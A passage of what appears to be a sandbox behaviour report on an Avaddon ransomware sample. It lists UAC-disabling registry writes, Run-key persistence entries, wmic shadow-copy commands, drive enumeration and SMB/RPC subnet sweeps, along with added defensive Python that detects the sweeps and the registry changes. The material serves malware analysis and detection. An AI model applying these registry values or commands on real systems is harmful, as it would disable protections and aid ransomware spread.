N/A 10.127.1.108:135 tcp
N/A 10.127.1.112:135 tcp
N/A 10.127.1.113:135 tcp
N/A 10.127.1.114:135 tcp
N/A 10.127.1.116:135 tcp
N/A 10.127.1.106:135 tcp
N/A 10.127.1.109:135 tcp
N/A 10.127.1.110:135 tcp
N/A 10.127.1.111:135 tcp
N/A 10.127.1.115:135 tcp
N/A 10.127.1.117:135 tcp
N/A 10.127.1.122:135 tcp
N/A 10.127.1.107:135 tcp
N/A 10.127.1.86:135 tcp
N/A 10.127.1.90:135 tcp
N/A 10.127.1.91:135 tcp
N/A 10.127.1.92:135 tcp
N/A 10.127.1.93:135 tcp
N/A 10.127.1.94:135 tcp
N/A 10.127.1.87:135 tcp
N/A 10.127.1.88:135 tcp
N/A 10.127.1.89:135 tcp
N/A 10.127.1.95:135 tcp
N/A 10.127.1.96:135 tcp
N/A 10.127.1.98:135 tcp
N/A 10.127.1.101:135 tcp
N/A 10.127.1.102:135 tcp
N/A 10.127.1.104:135 tcp
N/A 10.127.1.97:135 tcp
N/A 10.127.1.99:135 tcp
N/A 10.127.1.100:135 tcp
N/A 10.127.1.103:135 tcp
N/A 10.127.1.72:135 tcp
N/A 10.127.1.73:135 tcp
N/A 10.127.1.74:135 tcp
N/A 10.127.1.75:135 tcp
N/A 10.127.1.76:135 tcp
N/A 10.127.1.81:135 tcp
N/A 10.127.1.82:135 tcp
N/A 10.127.1.83:135 tcp
N/A 10.127.1.84:135 tcp
N/A 10.127.1.85:135 tcp
N/A 10.127.1.77:135 tcp
N/A 10.127.1.78:135 tcp
N/A 10.127.1.79:135 tcp
N/A 10.127.1.80:135 tcp
N/A 10.127.1.61:135 tcp
N/A 10.127.1.64:135 tcp
N/A 10.127.1.65:135 tcp
N/A 10.127.1.66:135 tcp
N/A 10.127.1.67:135 tcp
N/A 10.127.1.68:135 tcp
N/A 10.127.1.69:135 tcp
N/A 10.127.1.70:135 tcp
N/A 10.127.1.71:135 tcp
N/A 10.127.1.60:135 tcp
N/A 10.127.1.62:135 tcp
N/A 10.127.1.63:135 tcp
N/A 10.127.1.45:135 tcp
N/A 10.127.1.49:135 tcp
N/A 10.127.1.50:135 tcp
N/A 10.127.1.51:135 tcp
N/A 10.127.1.52:135 tcp
N/A 10.127.1.55:135 tcp
N/A 10.127.1.56:135 tcp
N/A 10.127.1.59:135 tcp
N/A 10.127.1.46:135 tcp
N/A 10.127.1.47:135 tcp
N/A 10.127.1.48:135 tcp
N/A 10.127.1.53:135 tcp
N/A 10.127.1.54:135 tcp
N/A 10.127.1.57:135 tcp
N/A 10.127.1.58:135 tcp
N/A 10.127.1.34:135 tcp
N/A 10.127.1.40:135 tcp
N/A 10.127.1.41:135 tcp
N/A 10.127.1.42:135 tcp
N/A 10.127.1.43:135 tcp
N/A 10.127.1.44:135 tcp
N/A 10.127.1.33:135 tcp
N/A 10.127.1.35:135 tcp
N/A 10.127.1.36:135 tcp
N/A 10.127.1.26:135 tcp
N/A 10.127.1.30:135 tcp
N/A 10.127.1.31:135 tcp
N/A 10.127.1.32:135 tcp
N/A 10.127.1.37:135 tcp
N/A 10.127.1.38:135 tcp
N/A 10.127.1.39:135 tcp
N/A 10.127.1.25:135 tcp
N/A 10.127.1.27:135 tcp
N/A 10.127.1.28:135 tcp
N/A 10.127.1.29:135 tcp
N/A 10.127.1.6:135 tcp
N/A 10.127.1.7:135 tcp
N/A 10.127.1.8:135 tcp
N/A 10.127.1.9:135 tcp
N/A 10.127.1.10:135 tcp
N/A 10.127.1.11:135 tcp
N/A 10.127.1.18:135 tcp
N/A 10.127.1.19:135 tcp
N/A 10.127.1.20:135 tcp
N/A 10.127.1.22:135 tcp
N/A 10.127.1.23:135 tcp
N/A 10.127.1.24:135 tcp
N/A 10.127.1.2:135 tcp
N/A 10.127.1.4:135 tcp
N/A 10.127.1.5:135 tcp
N/A 10.127.1.12:135 tcp
N/A 10.127.1.13:135 tcp
N/A 10.127.1.14:135 tcp
N/A 10.127.1.15:135 tcp
N/A 10.127.1.1:135 tcp
N/A 10.127.1.16:135 tcp
N/A 10.127.1.17:135 tcp
N/A 10.127.1.21:135 tcp
N/A 10.127.1.0:135 tcp
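Every row in this table is the sandbox host reaching one address of 10.127.1.0/24, first on TCP 445 (SMB) and then on TCP 135 (the RPC endpoint mapper): the sample sweeps its own subnet for hosts it can spread to. In flow, firewall or EDR network logs that shows up as one source touching hundreds of distinct destinations on a single port within seconds, which is a detection that does not depend on this sample at all. The following is an added example, not part of the report: a sliding-window sweep detector run over constructed flow records that replay this table from an assumed source address, next to an assumed benign workstation that only ever talks to two file servers. The window, the threshold and the set of watched ports are assumptions to tune per environment.

```python
import ipaddress
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float    # seconds since start of capture
    src: str
    dst: str
    dport: int
    proto: str = "tcp"


# Lateral-movement ports on which distinct destinations are counted (assumption).
SWEEP_PORTS = {135, 139, 445, 3389, 5985, 5986}


def make_sample_flows():
    """Constructed flow records modelled on the Network table in this report:
    an assumed sandbox address (10.127.1.100) reaching all 256 addresses of
    10.127.1.0/24 on 445 and then on 135, 10 ms apart, plus an assumed benign
    workstation (10.127.1.50) talking to two file servers over the same period."""
    flows, t = [], 0.0
    for port in (445, 135):
        for host in ipaddress.ip_network("10.127.1.0/24"):
            flows.append(Flow(t, "10.127.1.100", str(host), port))
            t += 0.01
    for i in range(40):
        flows.append(Flow(i * 0.2, "10.127.1.50", "10.127.1.10" if i % 2 else "10.127.1.11", 445))
    return flows


def detect_sweeps(flows, window=60.0, threshold=20):
    """Sliding-window count of distinct destinations per (src, dport).
    Returns {(src, dport): peak distinct-destination count} for every pair that
    reached `threshold` or more hosts within any `window`-second span."""
    recent = defaultdict(deque)   # (src, dport) -> deque of (ts, dst), oldest first
    alerts = {}
    for f in sorted(flows, key=lambda x: x.ts):
        if f.proto != "tcp" or f.dport not in SWEEP_PORTS:
            continue
        key = (f.src, f.dport)
        q = recent[key]
        q.append((f.ts, f.dst))
        while q and f.ts - q[0][0] > window:      # drop records older than the window
            q.popleft()
        distinct = len({dst for _, dst in q})     # O(window) per flow; fine for a demo
        if distinct >= threshold:
            alerts[key] = max(alerts.get(key, 0), distinct)
    return alerts


def coverage(flows, src, dport):
    """Fraction of each /24 that `src` touched on `dport`; 1.0 is a complete sweep."""
    per_net = defaultdict(set)
    for f in flows:
        if f.src == src and f.dport == dport:
            addr = ipaddress.ip_address(f.dst)
            per_net[ipaddress.ip_network(f"{addr}/24", strict=False)].add(addr)
    return {str(net): len(hosts) / net.num_addresses for net, hosts in per_net.items()}


if __name__ == "__main__":
    flows = make_sample_flows()
    for (src, dport), n in detect_sweeps(flows).items():
        print(f"{src} reached {n} distinct hosts on tcp/{dport}; coverage {coverage(flows, src, dport)}")
```

Counting distinct destinations rather than packets is what separates the sweep from a busy file-server client: the benign host in the sample issues 40 connections but never exceeds two destinations, so it stays below the threshold, while the sweeping host peaks at 256 on both ports and `coverage` reports the whole /24. The threshold of 20 is deliberately far below a full subnet so that a partial or rate-limited sweep still alerts.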

Files

C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt

MD5 f1f9fa7e0ac011f93ea508f6c0c595ef
SHA1 933ec77d7416e7cbb2d3e30a2250da2259112679
SHA256 54bb61b3fa4c51f7a518089987984e77ca4eb2ab4776fa458cb986dff1ddf816
SHA512 b96b3c5eb97484762a0cb52193ffb900d336edda4034bd57480f9f6e1b38bd2455eef9d058b24ca4b6da10df6b83c1fba549235428614f72df23532a28774fc7

C:\Users\Admin\Desktop\LockBit-note.hta

MD5 83b62f624992a5ac6afb087554d25c31
SHA1 5bf1c39eb8208e2a48dc6d9fc6f8f6f270e2bcde
SHA256 1e5f657e4ee5ec3beb3ffe32e4a514194e5617da74aec07eadd587670cf63a8b
SHA512 47a56042a5d1468ab8fc7609ff67ef23c5639866922953ec7afa391d384f4d28eaa566638f750bf0810747032bb816ed79bd11e5d40db7db06e941fa7cde8846

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1788s

Max time network

1806s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

Signatures

Avaddon

ransomware avaddon

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Renames multiple (158) files with added filename extension

ransomware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
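Taken together, the registry writes listed above do more than the "UAC bypass" label suggests: EnableLUA=0 switches User Account Control off entirely once the machine restarts, ConsentPromptBehaviorAdmin=0 makes every elevation request by an administrator succeed without a prompt, and the two Run values (in the user hive and in the 32-bit HKLM view) relaunch a copy of the sample from the roaming AppData folder at the next logon. The following is an added example, not from the report or the sample: a parser for the report's own "Set value" row layout and two rules that flag UAC-weakening policy values and Run entries whose target sits in a user-writable directory. The rows are copied from this analysis; the benign Explorer row used as a control and the ATT&CK technique mapping are the example's assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample: the registry rows of this analysis, in the report's own
# 'Set value (type) key = "value" process target' layout, plus one benign
# Explorer setting (assumed) as a control row.
SAMPLE_ROWS = r'''
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "1" C:\Windows\explorer.exe N/A
'''.strip().splitlines()


@dataclass(frozen=True)
class RegEvent:
    vtype: str
    hive: str      # "HKLM" or "HKU\<sid>"
    key: str       # key path below the hive, WOW6432Node redirection removed
    name: str      # value name
    value: str     # value data, with the report's doubled backslashes undone
    process: str   # image of the writing process


ROW = re.compile(r'^Set value \((\w+)\) (.+?) = "(.*)" (.+?) (\S+)$')
MACHINE, USER = "\\REGISTRY\\MACHINE\\", "\\REGISTRY\\USER\\"


def parse_row(line):
    """Parse one report row into a RegEvent, or None if it is not a value-set row."""
    m = ROW.match(line.strip())
    if not m:
        return None
    vtype, path, value, process, _target = m.groups()
    if path.upper().startswith(MACHINE):
        hive, rest = "HKLM", path[len(MACHINE):]
    elif path.upper().startswith(USER):
        sid, _, rest = path[len(USER):].partition("\\")
        hive = "HKU\\" + sid
    else:
        hive, rest = "?", path
    key, _, name = rest.rpartition("\\")
    key = re.sub(r"\\wow6432node", "", key, flags=re.I)   # 32-bit view maps to the same logical key
    return RegEvent(vtype, hive, key, name, value.replace("\\\\", "\\"), process)


UAC_POLICY_KEY = r"software\microsoft\windows\currentversion\policies\system"
# Value data that weakens UAC when written to the policy key above.
UAC_WEAKENING = {"enablelua": "0", "consentpromptbehavioradmin": "0", "promptonsecuredesktop": "0"}
RUN_KEYS = {r"software\microsoft\windows\currentversion\run",
            r"software\microsoft\windows\currentversion\runonce"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def evaluate(events):
    """Return (technique, rule, detail) tuples for UAC weakening and Run-key persistence."""
    findings = []
    for ev in events:
        key, name = ev.key.lower(), ev.name.lower()
        if key == UAC_POLICY_KEY and UAC_WEAKENING.get(name) == ev.value:
            findings.append(("T1548.002", f"UAC weakened: {ev.name}={ev.value}", ev.process))
        elif key in RUN_KEYS:
            where = "user-writable" if any(p in ev.value.lower() for p in USER_WRITABLE) else "system"
            findings.append(("T1547.001", f"Run value '{ev.name}' in {ev.hive} -> {where} path", ev.value))
    return findings


if __name__ == "__main__":
    for technique, rule, detail in evaluate([e for e in map(parse_row, SAMPLE_ROWS) if e]):
        print(technique, rule, detail)
```

Folding WOW6432Node out of the key path matters here: the same persistence entry written through the 32-bit registry view would otherwise slip past a rule that only knows the 64-bit path, and this sample writes it through both views. On the five rows above the parser yields two T1548.002 findings and two T1547.001 findings, both pointing at a user-writable path, and nothing for the Explorer control row.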

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-2480455240-981575606-1030659066-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 184.26.45.61:80 x2.c.lencr.org tcp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 61.45.26.184.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
US 8.8.8.8:53 213.80.50.20.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
